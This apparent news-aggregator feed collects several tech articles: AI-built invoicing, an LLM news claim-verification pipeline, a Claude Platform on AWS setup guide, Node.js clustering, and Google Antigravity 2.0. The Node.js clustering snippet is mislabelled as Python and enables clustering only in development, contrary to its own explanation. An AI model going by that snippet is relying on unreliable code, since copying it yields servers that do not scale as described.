That last point is critical. AI makes mistakes. Sometimes subtle ones. Sometimes confidently wrong ones. If you don't have the domain knowledge to catch them you'll ship broken software and not know it.
The mobile-responsive layout wasn't just a nice-to-have. I specified it because I know what it's like to stand in a garage trying to look something up on a phone. The internal time tracking that never shows on customer invoices — because as a mechanic you're always working against book labor times. A brake job
might book at 1.2 hours. Am I actually hitting that? Beating it? Where am I losing time? That's data I need for myself, not something a customer ever needs to see on their invoice.
The parts-first sorting on printed invoices — because a customer shouldn't have to read through a jumbled mix of parts and labor line items. Parts grouped together, labor grouped together, clean and readable.
None of that comes from a prompt. That comes from experience.
The AI was the hammer. I knew what needed to be built.
The industry is having an identity crisis about AI right now and I understand why. AI is ingesting human knowledge at an unprecedented scale and automating things that used to require years of skill development. That's genuinely disruptive and the anxiety around it is legitimate.
But here's what I keep coming back to:
The calculator didn't replace mathematicians. It elevated what mathematicians could accomplish. The people who refused to adapt didn't win — they just fell behind.
AI is the same inflection point.
The people who will thrive are not the ones who ignore it. They're not the ones who blindly depend on it either — pumping out slop and calling it productivity. They're the ones who understand it deeply enough to direct it, validate it, and know when it's wrong.
That requires real knowledge. Real experience. Real judgment.
I want to be transparent about something.
I run an automated "This Day in Tech History" blog on my personal website. The posts are AI generated. I use n8n workflows and locally hosted LLMs to draft them automatically.
Every single post sits in draft until I manually review and publish it.
The internet is already drowning in AI slop. I'm not interested in adding to it. The automation handles the drafting. The judgment is still mine.
I apply the same standard to my projects. My DOSBox Launcher — a GTK3 desktop app for managing DOS games on Linux — has the AI authorship breakdown documented directly in the README:
That's the line I try to walk with all of this. AI as a tool. AI as an assistant. Not AI as a replacement for thinking.
To put that number in perspective — a freelance developer would charge anywhere from $3,000 to $10,000+ for an application like this. A SaaS alternative would run $50-100/month indefinitely.
I spent fifty cents and an afternoon.
That's not a party trick. That's a fundamental shift in what a single person with domain knowledge and the right tools can accomplish.
I'm a 45 year old self-taught infrastructure engineer, army veteran, and automotive technician from Texas. I don't have a degree. I don't have a fancy job title. I have 32 years of continuous self-directed learning, a homelab that saves me an estimated $26,000 a year in SaaS costs, and an invoicing application that cost me fifty cents and actually understands
how a mechanic's business works.
AI didn't replace my knowledge. It gave my knowledge a power tool.
That's the correct way to use it.

---
## Fighter jet tracks UFO in newly released Pentagon footage

> Published: 2026-05-24 06:18:35+00:00
> Source: http://www.euronews.com/video/2026/05/24/fighter-jet-tracks-ufo-in-newly-released-pentagon-footage
> wpnews: https://wpnews.pro/news/fighter-jet-tracks-ufo-in-newly-released-pentagon-footage

The Pentagon released newly declassified footage showing a fighter jet tracking an unidentified aerial phenomenon (UAP), part of a broader effort to increase transparency around military encounters with UFOs. The videos, which are among the latest batch of previously classified files, depict objects observed by military personnel but offer no evidence of extraterrestrial life.

Video.
Fighter jet tracks UFO in newly released Pentagon footage
Copy/paste the link below:
Copy/paste the article video embed link below:
Updated:
The Pentagon released another batch of previously classified UFO files, including military videos of unidentified aerial phenomena, saying the material is intended to provide “unprecedented transparency” despite offering no evidence of alien life.

---
## Source Score: Continuing Exploration of LLM Usage in Automated Workflows

> Published: 2026-05-24 06:17:50+00:00
> Source: https://dev.to/semmet/source-score-continuing-exploration-of-llm-usage-in-automated-workflows-eoi
> wpnews: https://wpnews.pro/news/source-score-continuing-exploration-of-llm-usage-in-automated-workflows

The article describes a system that automates the extraction and verification of falsifiable claims from news articles. It uses NewsData.io to fetch the ten newest articles from a source, then employs LLMs via OpenRouter to select the best falsifiable claim, fill in missing summaries, and find independent proofs. The workflow runs weekly using Python scripts, custom OpenRouter skills, and GitHub Actions, ultimately generating pull requests with ready-to-ingest claim and proof files.

TL;DR– I built a weekly pipeline that pulls the ten newest articles from a news outlet, picks the one that actually makes a falsifiable claim, fills in any missing summary, finds two independent proofs, and opens PRs with ready‑to‑ingest`claims/`

and`proofs/`

files. All of this runs on a couple of Python scripts, 2 custom OpenRouter skills, and two GitHub Actions.

In my last post I covered how I automated ingestion of top news sources by combining Firecrawl, OpenRouter API, and Github Action workflows. In this post I'll implement the same pattern for news source claims and their proofs.

The first challenge I ran into was to figure out a way to fetch recent articles published by a news source. Luckily, I found [NewsData.IO](https://newsdata.io/) which provides an API to search, collect and track worldwide news. The NewsData.io free tier gives me 200 API credits per day, more than enough for a weekly run across 12 sources (*for now at least* 😌).

## 1️⃣ Fetch the latest articles - [newsdata_io.py](https://github.com/SatyaLens/sources/blob/main/scripts/newsdata_io.py)

The first step is to write a thin wrapper around the **NewsData.io** `latest`

endpoint. It pulls the **10 most recent articles** for a given domain.

```
# Free‑tier‑friendly query params
CATEGORY = "environment,technology,world"
LANGUAGE = "en"
REMOVE_DUPLICATE = "1"
SIZE = "10"
DATATYPE = "news,research,analysis,pressRelease"

NEWSDATA_API_BASE_URL = os.getenv(
    "NEWSDATA_API_BASE_URL", "https://newsdata.io/api/1"
)
NEWSDATA_API_KEY = os.environ["NEWSDATA_API_KEY"]

def get_claims(src_domain_url: str):
    """
    Call the NewsData.io `/latest` endpoint for a specific domain.
    Returns a list of article dicts (or None on error).
    """
    endpoint = f"{NEWSDATA_API_BASE_URL}/latest"
    params = {
        "category": CATEGORY,
        "language": LANGUAGE,
        "removeduplicate": REMOVE_DUPLICATE,
        "size": SIZE,
        "datatype": DATATYPE,
        "apikey": NEWSDATA_API_KEY,
        "domainurl": src_domain_url,
    }
    response = requests.get(endpoint, params=params, timeout=10)
    if response.status_code != 200:
        print(
            f"Error: couldn't fetch claims for {src_domain_url}: {response.status_code}"
        )
        # Show suggestions if the API knows a better domain
        resp_body = response.json()
        if (
            resp_body.get("results") is not None
            and resp_body.get("results")[0].get("suggestion") is not None
        ):
            print(
                f"Suggested domain url(s) for {src_domain_url}: {resp_body['results'][0]['suggestion']}"
            )
        return None
    return response.json()["results"]
```

*Why it matters*: The free tier only gives 200 credits per day, so we keep the request lightweight: single domain, ten results, and a narrow set of categories. The `DATATYPE`

filter is intentionally broad; we prune non‑falsifiable items later.

## 2️⃣ Filter for a falsifiable claim - the **claim‑verification** skill

Given the way I'm currently calculating scores for a news source, only claims that are falsifiable matter. So out of all the claims returned by NewsData API I'm keeping only one that matches the **falsifiable claim** criteria best.

I'm using LLMs to perform this classification, to be specific, I'm forwarding an array of objects returned by NewsData API to OpenRouter API.

```
[{
"article_id": "40305aa160787297dd3f9cc15faa8637",
"link": "https://www.theguardian.com/us-news/2026/may/22/kansas-bird-nest-truck",
"title": "Federally protected bird’s nest holds up sale of Ford truck in Kansas",
"description": "A robin built a nest on a Ford-F-250’s tire and laid its eggs in it; a law prohibits removing it while inhabited by bird brood A truck sold by a Kansas dealership cannot be taken from the lot by its new owner because a family of robins is living atop one of the vehicle’s tires. The relatively novel situation has gained widespread attention after the dealership in the Kansas community of Olathe wrote about it on its Facebook page – and it perhaps taught many that active robin nests are protected by federal law from the US. Continue reading...",
"keywords": [
"birds",
"kansas",
"wildlife",
"ford",
"animals",
"us news",
"law (us)"
],
"creator": [
"josé olivares"
],
"language": "english",
"country": [
"united states of america"
],
"category": [
"top",
"environment"
],
"datatype": "news",
"pubDate": "2026-05-22 19:03:07",
"pubDateTZ": "UTC",
"fetched_at": "2026-05-22 19:32:47",
"image_url": "https://i.guim.co.uk/img/media/c9e972eb2d494c4a9c713a7b5550f0fa9efcae1f/0_503_1536_1229/master/1536.jpg?width=140&quality=85&auto=format&fit=max&s=ad95c6dcdf71df9bc3461b683effe424",
"video_url": null,
"source_id": "theguardian",
"source_name": "The Guardian",
"source_priority": 106,
"source_url": "https://www.theguardian.com",
"source_icon": "https://n.bytvi.com/theguardian.jpg",
"duplicate": false
}]
```

To help with the classification I wrote an AI ** agent skill**. It tells the LLM to:

-
**Visit each article URL** with the web‑search tool. -
**Detect** whether the article contains a claim that can be objectively proven true or false. -
**Return exactly one** JSON object that matches the criteria.

```
CLAIM_FILTER_PROMPT = (
    "Use web search tool to visit the link for each article, access the content and then assess if it is a falsifiable claim."
    "Out of these 10 articles, only return 1 article that best fits the falsifiable claim criterion."
    "Prefer claims that have been made by the news source directly."
    "Keep the json structure of the claims the same as the original schema in the input. Do not add, remove, or modify any key or value."
    "Only output the plain json array string that I can safely unmarshal."
    "Do not format the string. Do not output anything else."
)

req_content = (
    "Following is a list of 10 articles published by the same news outlet. Each article is represented by a json string type element in the array"
    f"\n\n{claims}\n\n"
    f"{CLAIM_FILTER_PROMPT}"
)

filtered_claims = openrouter.req_w_addons(
    req_content, skill=falsifiable_claim_skill, tools=[openrouter.WEB_SEARCH_TOOL]
)
```

*Result*: A single, well‑structured claim with all the fields required to create a claim ingestion doc.

I'm only selecting one claim for now, once I've verified the stability of ingestion workflows and the reliability of OpenRouter responses I'll the increase the count and the ingestion frequency.

## 3️⃣ Fill in missing descriptions - a quick summarization pass

NewsData.io sometimes returns `"null"`

for the `description`

field. When that happens I'm asking **OpenRouter** to summarize the article in under 500 characters.

```
CLAIM_SUMMARY_PROMPT = (
    "Use web search tool to visit the link to the article and access its content."
    "Summarize the article in under 500 characters."
    "Return only the summary without any additional text."
)

req_content = (
    "Following is the url to an article published by a news media outlet."
    f"\n\n{claim['link']}\n\n"
    f"{CLAIM_SUMMARY_PROMPT}"
)

claim_summary = openrouter.req_w_addons(
    req_content, tools=[openrouter.WEB_SEARCH_TOOL]
)

claim["description"] = claim_summary
```

Now every claim has a concise, human‑readable description, even when the source API left it blank.

## 4️⃣ Weekly claim ingestion - GitHub Actions [workflow](https://github.com/SatyaLens/sources/actions/workflows/fetch_ingest_claims.yml)

The whole thing runs on a **GitHub Actions** schedule once a week. The [workflow](https://github.com/SatyaLens/sources/blob/main/.github/workflows/fetch_ingest_claims.yml) checks out the repo, installs dependencies, runs `ingest_claims.py`

, and opens a PR.

*Outcome*: A [PR](https://github.com/SatyaLens/sources/pull/49) appears every Sunday with fresh claim documents, ready for review.

## 5️⃣ Fetch proofs - [ingest_proofs.py](https://github.com/SatyaLens/sources/blob/main/scripts/ingest_proofs.py) + [workflow](https://github.com/SatyaLens/sources/blob/main/.github/workflows/fetch_ingest_proofs.yml)

Once a claim has been ingested, I need **proofs** that either support or refute it. The proof‑verification prompt asks the LLM to find **two** independent sources and label each with a boolean `supports_claim`

.

To help LLMs search for supporting or refuting proofs for a given claim using web search tool, I wrote another skill, [claim-verification](https://github.com/semmet95/agent-skills/blob/main/claim-verification/SKILL.md), which performs the following:

-
**Extracts and validates falsifiable claims**: Takes a URL to a media article/post and identifies the core, testable claim from its content, ensuring it's concrete and can be proven true or false. -
**Performs targeted web searches**: Uses time-aware search queries to find up to two high-quality external documents that directly support or refute the claim, with strict attention to temporal relevance (matching the claim's timeframe). -
**Returns verifiable evidence URLs**: Outputs a JSON array of retrieved URLs with boolean indicators (supports_claim: true/false) showing whether each document confirms or contradicts the original claim, prioritizing official/authoritative sources over opinion pieces.

```
CLAIM_VERIFICATION_PROMPT = (
    "Use web search tool to access the claim link, fetch the content and process it."
    "Use the web search tool again to look for proofs in the form of official statements, press releases, or reports from reputable sources to prove the claim right or wrong conclusively."
    "Ensure that the proofs belong to the same timeline as the claim. Do not include outdated sources."
    "Output links to the 2 sources that prove the claim right or wrong and specify as a boolean whether they support the claim or not."
    "The output format should be a json array with each element being a json object corresponding to a source supporting or refuting the claim."
    "Each json element should follow the following schema: {\"uri\": \"string\", \"supports_claim\": boolean}"
)

req_content = (
    "Following is a link to a falsifiable claim by a news media outlet as an article"
    f"\n\n{claim['uri']}\n\n"
    f"{CLAIM_VERIFICATION_PROMPT}"
)

claim_proofs = openrouter.req_w_addons(
    req_content, skill=claim_verification_skill, tools=[openrouter.WEB_SEARCH_TOOL]
)
```

** Proof workflow**: Just like claim ingestion workflow, I'm running proof ingestion workflow once a week. It runs the

`ingest_proofs.py`

script, creates the proof documents in a new branch, then creates a PR from this branch to the `main`

branch.*Outcome*: A [PR](https://github.com/SatyaLens/sources/pull/48) appears every Sunday with fresh proof documents for ingested claims, ready for review.

## 6️⃣ OpenRouter reliability improvements

Since my OpenRouter API usage has been increasing, my list of free tier models is shortened to the following:

```
FREE_MODELS_DOC = [
    "google/gemma-4-31b-it:free",
    "nvidia/nemotron-3-nano-omni-30b-a3b-reasoning:free",
    "openrouter/free"
]
```

These three models consistently give good results while staying within the free tier.

### Back‑off retry loop ([openrouter.py](https://github.com/SatyaLens/sources/blob/main/scripts/openrouter.py))

I also added incremental delays between retries to reduce the odds of running into server side errors.

```
for i in range(1, OPENROUTER_MAX_RETRIES + 1):
    status, body = helper.post_request(...)
    if status in (0, 429) or 500 <= status < 600:
        print(f"OpenRouter API returned status {status}, retrying...", file=sys.stderr)
        time.sleep(10 * i)
        continue
    # success handling...
```

*Impact*: 500‑error rate dropped dramatically, and weekly API spend stayed well under the free‑tier limits.

I really like this OpenRouter dashboard btw.

## 7️⃣ Trade‑offs & limitations

| Aspect | Trade‑off |
|---|---|
Free‑tier limits |
200 NewsData.io credits/day restricts us to a single domain p

---
## Tried using the Claude Platform on AWS

> Published: 2026-05-24 06:15:34+00:00
> Source: https://dev.to/aws-builders/tried-using-the-claude-platform-on-aws-4dob
> wpnews: https://wpnews.pro/news/tried-using-the-claude-platform-on-aws

The Claude Platform on AWS is now generally available, allowing users to access Anthropic's native Claude API directly through their AWS account with integrated IAM authentication, AWS billing, and CloudTrail auditing. New features released by Anthropic become available on AWS the same day, and inference runs on Anthropic's infrastructure outside AWS's security boundary. The setup process involves creating a workspace in the AWS Management Console, generating an API key, and configuring environment variables to start using the API.

The Claude platform on AWS is now generally available.
This will allow you to access Claude, Anthropic's native platform, directly through your AWS account.
Claude Platform on AWS is now generally available
1. Use Anthropic’s official Claude API directly with your AWS account
Claude Platform on AWS is a new offering that allows you to use Anthropic’s native Claude API—operated by Anthropic—seamlessly integrated with AWS IAM authentication, AWS billing, and CloudTrail auditing.
2. Immediate access to the latest features (full functionality, full speed)
New features released by Anthropic become available on AWS the same day.
3. Inference runs on Anthropic infrastructure
Since Claude Platform on AWS is operated by Anthropic, inference runs outside AWS’s security boundary.
Open the “Claude Platform on AWS” page in the AWS Management Console and click “Get Started.”
Click “Continue.”
Enter your email address and click “Start.”
You will receive an email from Anthropic titled “Set up your Claude organization.” Click the link.
Enter your organization details and click “Complete setup.”
Click “Create Workspace.”
Your workspace will be created. Make sure to note the workspace ID.
Select the “Admin” role and sign in.
Claude Console will open.
Let’s take a look at some of the available features.
You can register and manage agent skills.
You can create and manage agents.
You can monitor token usage and costs.
You can view rate limits and manage data residency.
Generate an API key from the dashboard.
Set an expiration date and generate the key.
Make sure to save the generated API key.
On the “Claude Platform on AWS” page, you can create and manage API keys under “API Keys.”
Set your environment variables:
export AWS_REGION="us-east-1"
export ANTHROPIC_WORKSPACE_ID="wrkspc_xxxxx"
export CLAUDE_AWS_BASE_URL="https://aws-external-anthropic.${AWS_REGION}.api.aws"
export ANTHROPIC_API_KEY="xxxxx"
Try asking what Amazon Bedrock is.
curl "https://aws-external-anthropic.us-east-1.api.aws/v1/messages" \
-H "x-api-key: $ANTHROPIC_API_KEY" \
-H "x-amz-security-token: $AWS_SESSION_TOKEN" \
-H "content-type: application/json" \
-H "anthropic-version: 2023-06-01" \
-H "anthropic-workspace-id: $ANTHROPIC_WORKSPACE_ID" \
-d '{
"model": "claude-sonnet-4-6",
"max_tokens": 1024,
"messages": [
{"role": "user", "content": "What is Amazon Bedrock?"}
]
}'
If you receive a response like the one below, it’s working correctly:
{
"model": "claude-sonnet-4-6",
"id": "msg_xxxxx",
"type": "message",
"role": "assistant",
"content": [
{
"type": "text",
"text": "# Amazon Bedrockとは\n\nAmazon Bedrockは、**AWSが提供する完全マネージド型の生成AIサービス**です。\n\n---\n\n## 主な特徴\n\n### 🤖 複数の基盤モデル（Foundation Models）へのアクセス\n様々なAIプロバイダーのモデルを一つのAPIで利 用できます：\n\n| プロバイダー | モデル例 |\n|------------|---------|\n| Amazon | Amazon Titan |\n| Anthropic | Claude 3.5など |\n| Meta | Llama 3など |\n| Mistral AI | Mistral / Mixtralなど |\n| Stability AI | Stable Diffusionなど |\n\n---\n\n## 主な機能\n\n- **テキスト生成** - 文章作成、要約、翻訳など\n- **画像生成** - テキストから画像を生成\n- **RAG（検索拡張生成）** - 独自データと組み合わせた回答生成\n- **AIエージェント** - 複雑なタスクの自動化\n- **Fine-tuning** - 独自データでモデルをカスタマイズ\n\n---\n\n## メリット\n\n✅ **サーバーレス** - インフラ管理不要 \n✅ **セキュリティ** - データはAWS内で保護 \n✅ **スケーラビリティ** - 需要に応じて自動スケール \n✅ **コスト効率** - 使った分だけ支払い\n\n---\n\n## ユースケース例\n\n- チャットボット・カスタマーサポート\n- ドキュメント分析・要約\n- コード生成\n- コンテンツ作成\n\nAWSのエコシステム（S3、Lambda等）と連携しやすいのも大きな利点です。\n\n何か具体的に知りたい点はありますか？"
}
],
"stop_reason": "end_turn",
"stop_sequence": null,
"stop_details": null,
"usage": {
"input_tokens": 18,
"cache_creation_input_tokens": 0,
"cache_read_input_tokens": 0,
"cache_creation": {
"ephemeral_5m_input_tokens": 0,
"ephemeral_1h_input_tokens": 0
},
"output_tokens": 527,
"service_tier": "standard",
"inference_geo": "global"
}
}
Being able to use the latest native Claude features directly with your AWS account is surprisingly smooth, and the setup is incredibly simple.
This greatly expands the range of development possibilities.
Since inference runs on Anthropic’s side, it’s important to choose between Bedrock and Claude Platform on AWS depending on your use case.
It’s a good idea to become comfortable using Claude in various patterns.

---
## Your Node.js Server is Using Just One CPU. Here's How to Fix It.

> Published: 2026-05-24 06:10:34+00:00
> Source: https://dev.to/blackwatch021/your-nodejs-server-is-using-just-one-cpu-heres-how-to-fix-it-4ee
> wpnews: https://wpnews.pro/news/your-node-js-server-is-using-just-one-cpu-here-s-how-to-fix-it

The article explains that Node.js runs on a single thread, meaning a deployed application only utilizes one vCPU at a time, leaving additional vCPUs idle. It introduces clustering as a solution, which spawns multiple worker processes to utilize all available CPU cores, and provides a code example using Node's native `cluster` and `os` modules. The article also addresses challenges with stateful connections like WebSockets, noting that workers cannot share in-memory data, which requires solutions like sticky sessions or external data stores.

## CLUSTERING

You created your node application, it's ready, you have chosen an 8 vCPU instance to deploy it. You are done with deployment. Everything is working fine, but unknowingly you aren't using the full potential of the deployment. We know that node.js runs on a SINGLE THREAD, which means our node application uses only one vCPU at a time — but you took an 8 vCPU instance, so aren't the other 7 vCPUs sitting there idle?

The solution for this is CLUSTERING. It's a concept of running multiple instances of an application, where each works as an individual entity but still gets the work done and runs on the same port. Now the question is — how will this work? Isn't it going to cause issues among the instances? The simple and short answer is no.

## HOW IT WORKS

When clustering is done, we end up with multiple processes. There are two kinds:

- Primary – There is only one primary. It is responsible for spinning up the worker processes, managing them, and if any one of them dies, spawning it back. The primary is there only to manage — it doesn't run the code (connecting with db, spinning up server, etc.) Note – If the primary is down, the entire cluster will crash.
- Workers – These are the actual instances where the application runs — they serve the users.

**Key Facts**

- Since there are 8 vCPUs in our case, there will be 9 total processes — 1 primary + 8 workers.
- Each worker has its own memory – nothing is shared among workers.
- Workers share a single port – connections are distributed across them.
- Primary is intentionally dumb – never runs code or connects with db.
- Workers can't see their siblings — for each worker, only itself exists.

**CODE SNIPPET**

``` python
import cluster from "node:cluster";
import os from "node:os";
import app from "./src/app";
import { connectDB } from "./src/config/database";
import { createServer } from "http";

const PORT = process.env.PORT || 3000;
const enableCluster = process.env.NODE_ENV === "development";

if (enableCluster && cluster.isPrimary) {
  const numWorkers = os.cpus().length;
  for (let i = 0; i < numWorkers; i++) cluster.fork();

  cluster.on("exit", (worker) => {
    console.log(`worker ${worker.process.pid} died — respawning`);
    cluster.fork();
  });
} else {
  const httpServer = createServer(app);
  connectDB().then(() => httpServer.listen(PORT));
}
```

**EXPLANATION OF CODE**

In production we generally use services like pm2 to manage clustering, but here we are doing it using native options. For that, we first need the cluster and os modules of node.

Then we check if the current process is the primary or not. If it is the primary, we spawn new workers as per the number of cores available — it's not hard coded, we may change it as per our convenience, but it should not be more than the number of cores/vCPUs. If it isn't the primary (meaning we are already inside a worker), we run the actual backend code — connecting to the DB and starting the server. So now we have 8 worker instances up and running (plus the primary watching over them).

Using process.pid, we can see the unique id of each worker.

Note – this id, and whatever happens inside an instance, stays there only. Other instances can't access this one's data, process, etc.

**PROS/CONS**

Pros:

- Uses all CPU cores
- Crash isolation
- Built into Node
- Higher throughput, CPU-bound work
- Auto-respawns dead workers

Cons:

- Each worker has its own RAM (no shared state)
- In-memory caches/sessions break silently
- WebSockets/SSE need extra infrastructure
- Harder to debug – 'which worker logged that?'
- Primary crash = whole cluster dies

*Note – load balancing is round-robin on Linux; on Windows, the OS decides routing.*

## BIG CAVEAT

This much is enough for simple clustering or for learning purposes, as long as our app is using stateless data (REST APIs backed by a DB).

In this case, the DB is the source of truth. Workers don't need to know about each other. Any worker can serve any request.

**STATEFUL connections (WebSocket)**

*Prerequisite — knowledge of websockets.*

Now things change. Once a connection is established and the HTTP request is upgraded to a WebSocket, the socket connection details (which user is on which socket) are stored in memory, inside that worker. So if User A connects through Worker 1 and User B connects through Worker 2, both are logged in and both users' data is stored in the DB. But the live sockets sit on different workers. Now when A sends a message to B, Worker 1 tries to push it to B's socket — but B's socket lives in Worker 2's memory, not Worker 1's. So the message gets saved to the DB, but real-time delivery to B fails.

Also, workers are standalone, so they can't even talk to each other to ask "do you have this user with you?"

A TCP socket lives inside one process.

**STICKY Session**

Imagine a user lands on Worker A and creates a socket connection. Details regarding the session are stored in Worker A's memory. Somehow, on the next request, the user is shifted to Worker B. Now the user tries to continue the conversation. The worker checks if this session exists or not, but there is no record of it in Worker B (that detail lives in Worker A). So the interaction fails.

To make it easier to picture, here are two ways to think about it:

*Analogy 1* (hotel front desk) — You check into Hotel A. The front desk writes your name against Room 204. Later, you walk into Hotel B and ask for your room key. Hotel B has no idea who you are, because your check-in details only exist at Hotel A's front desk.

*Analogy 2* (locker at a station) — You drop your bag at locker #5 in Station A and get a ticket. Later, you go to Station B and try to use the same ticket. Station B has no locker matching that ticket, because the bag is sitting back in Station A.

To mitigate this issue, we need Sticky Sessions. It ensures that a user stays on a single worker only — pinning all of one client's requests to the same worker.

*One more thing worth knowing* — Socket.IO's connection handshake itself is made of multiple HTTP requests (long-polling fallback) before it upgrades to WebSocket. Without stickiness, those handshake requests can scatter across different workers, and the connection never even establishes. So sticky sessions are needed not just after the user is connected, but during the initial connection itself.

**REDIS ADAPTER for SOCKET**

Even with stickiness, workers still can't communicate with each other. So User A on Worker 1 has no way to push a message to User B sitting on Worker 2. This is a major issue in applications using sockets or real-time communication. To solve this, we have adapters — one of them is the Redis adapter for Socket.IO. It acts as a coordination layer on pub/sub. With this in place, when Worker 1 emits a message, the adapter publishes that emit to a shared bus (Redis). Every worker is subscribed to this bus, and the worker that actually owns B's socket picks it up and delivers the message locally. Now the application will work just like an application running on a single instance.

**STICKY + ADAPTER**

The two solve different problems, and you actually need both together.

- Sticky sessions make sure a user's requests always land on the same worker, so the connection (and the handshake) never breaks mid-way.
- The Redis adapter makes sure that when a worker needs to push a message to a user sitting on a different worker, the message can still reach them through the shared pub/sub bus.

Sticky alone — your user stays connected, but messages between users on different workers still don't reach. Adapter alone — workers can broadcast across each other, but the initial connection itself keeps breaking. Together — your clustered app behaves like a single instance from the user's perspective.

*TL;DR*

Node is single-threaded. Clustering spawns one worker per core. REST scales for free because the DB is shared. Sockets don't — connections live in one worker's RAM. Fix with sticky sessions (so handshakes complete) plus a pub/sub adapter (so workers can deliver each other's messages).

So this sums up basic clustering in a node.js application.

Thanks for reading.

---
## 🚀 Google Antigravity 2.0 Quietly Changes What It Means to Be a Software Engineer

> Published: 2026-05-24 06:08:55+00:00
> Source: https://dev.to/mohamednizzad/google-antigravity-20-quietly-changes-what-it-means-to-be-a-software-engineer-jke
> wpnews: https://wpnews.pro/news/google-antigravity-2-0-quietly-changes-what-it-means-to-be-a-software-engineer

At Google I/O 2026, Google introduced Antigravity 2.0, a platform expansion powered by Gemini 3.5 Flash that shifts software engineering from writing code line-by-line to orchestrating intelligent agents. The system allows developers to define goals and constraints while specialized subagents execute tasks in parallel, fundamentally changing the developer's role from producer to director. This represents a significant conceptual shift in software engineering, comparable to the impact of cloud computing on infrastructure.

*This is a submission for the Google I/O 2026 Writing Challenge*

## Google Antigravity 2.0 Quietly Changes What It Means to Be a Software Engineer

*The most important lesson from Google I/O 2026 isn't that AI writes more code. It's that developers are being asked to manage intelligence instead of producing software line by line.*

## Table of Contents

[The Day I Realized We Were Asking the Wrong Question](#wrong-question)[1️⃣ What Google Actually Announced](#what-announced)[2️⃣ Why Everyone Is Focusing on the Wrong Thing](#wrong-thing)[3️⃣ The Developer-to-Director Shift](#director-shift)[4️⃣ What Makes Antigravity 2.0 Different?](#what-different)[5️⃣ I Tested the New Mental Model](#hands-on)[6️⃣ Why Orchestration Matters More Than Velocity](#orchestration)[7️⃣ What Legal AI Taught Me About Agents](#legal-ai)[8️⃣ Risks Nobody Is Talking About Enough](#risks)[9️⃣ The Competitive Landscape](#competitive)[🔟 Predictions for the Next Three Years](#predictions)[Key Takeaways](#takeaways)[Further Reading & References](#reference)[Conclusion](#conclusion)

## The Day I Realized We Are Asking the Wrong Question

For the last three years, the dominant conversation around AI-assisted development has revolved around one question:

"How much faster can AI help me write code?"

[Google I/O 2026](https://io.google/2026/) convinced me we have been asking the wrong question entirely.

After watching the [Antigravity 2.0 announcements](https://www.youtube.com/watch?v=T_fnhr5lVBw) and spending time understanding the architecture behind them, I came away with a single, clarifying conclusion:

**The most important shift is not that AI can write more code. It's that developers are increasingly becoming directors of intelligent systems rather than authors of every implementation detail.**

That distinction sounds subtle. I don't think it is.

I believe it represents one of the most significant conceptual changes in software engineering since cloud computing transformed how we think about infrastructure. And it was hiding in plain sight inside what most coverage described as "a new coding tool."

This article explores why — and what it means for anyone building software today.

## 1️⃣ What Google Actually Announced

At [Google I/O 2026](https://io.google/2026/), Google introduced [Antigravity 2.0](https://antigravity.google/product/antigravity-2) — not as an incremental IDE upgrade, but as a full platform expansion with five surfaces shipped simultaneously.

| Surface | What It Does |
|---|---|
|
Standalone app for managing and orchestrating agents - no IDE required |
`agy` ) |
Terminal-native, same agent harness as the desktop, built in Go |
|
Primitives for building custom agents on Google's coding infrastructure |
|
Agent orchestration embedded directly into your own applications |
|
Vertex AI evolved - governance, session memory, centralized controls |

The model powering all of it is ** Gemini 3.5 Flash**, which Google claims outperforms

[Gemini 3.1 Pro](https://deepmind.google/models/gemini/pro/)on

[coding benchmarks](https://livebench.ai/#/?highunseenbias=true)while running four times faster than competing frontier models.

One detail that deserves its own headline: [Gemini 3.5 Flash](https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-5/) was co-developed *using* Antigravity. Google ran the experiment on itself — and the fact that they're willing to say that publicly matters.

On stage, Director of Software Engineering [Varun Mohan](https://www.youtube.com/watch?v=T_fnhr5lVBw) used Antigravity 2.0's parallel agents to build a working operating system core from scratch — then ran a live Doom clone on top of it — **for under $1,000** in compute costs. That [demo ](https://www.youtube.com/watch?v=T_fnhr5lVBw) made headlines. The architecture behind it is more important than the demo itself.

⚠️ Gemini CLI users:Sunset date isJune 18, 2026— 28 days from announcement.[Migration is not optional].

## 2️⃣ Why Everyone Is Focusing on the Wrong Thing

Most coverage of Antigravity 2.0 landed on benchmarks, speed comparisons, and the OS-building demo. All accurate. None of it is the real story.

The first generation of AI coding tools followed a familiar pattern:

```
Developer writes code → AI suggests → Developer accepts/rejects → Repeat
```

The developer remained the primary *producer*. AI acted as an accelerator on a process that was fundamentally unchanged.

Antigravity 2.0 introduces a structurally different loop:

```
Developer defines goal + constraints
        ↓
Agent spawns specialized subagents
        ↓
Parallel execution across tasks
        ↓
Developer evaluates outputs
        ↓
Developer refines direction
```

Notice what changed.

The developer is no longer spending primary effort on producing implementation details. The developer spends primary effort on **defining objectives, setting constraints, and evaluating outcomes**.

The center of gravity moves from *writing* toward *orchestrating*.

That shift deserves far more attention than any benchmark chart.

## 3️⃣ The Developer-to-Director Shift

The phrase that kept coming to mind while studying Antigravity 2.0:

**The developer becomes the director.**

Directors don't personally operate every camera. They coordinate specialists toward a coherent outcome — defining the vision, allocating responsibilities, evaluating what's working, redirecting what isn't.

Software development with parallel agents increasingly looks the same.

Imagine a feature request:

"Add async payment processing with distributed tracing, rate limiting, and integration tests."

**Traditionally:** design architecture → write implementation → write tests → instrument observability → perform code review. Sequential. All on you.

**With Antigravity 2.0:**

``` js
// Conceptual Antigravity SDK orchestration
import { AgentOrchestrator } from '@google/antigravity-sdk';

const orchestrator = new AgentOrchestrator({
  model: 'gemini-3.5-flash',
  parallelAgents: 4,
  sandboxed: true, // agents run in isolated Linux environments
});

const result = await orchestrator.run({
  intent: "Add async payment processing with OpenTelemetry tracing and 90%+ test coverage",
  context: {
    codebase: './src/payments',
    constraints: ['no breaking API changes', 'preserve existing error codes']
  },
  subagents: [
    { role: 'refactor',      focus: 'async patterns'         },
    { role: 'observability', focus: 'tracing instrumentation' },
    { role: 'testing',       focus: 'integration test suite'  },
    { role: 'review',        focus: 'cross-agent consistency' }
  ]
});
```

The four specialized agents execute in parallel. The `review`

subagent checks consistency *across* the other agents' outputs — a meta-layer of quality control that single-agent systems structurally cannot provide.

## 4️⃣ What Makes Antigravity 2.0 Different?

Several design decisions stand out as genuinely distinctive rather than marketing language.

### One Harness Across All Surfaces

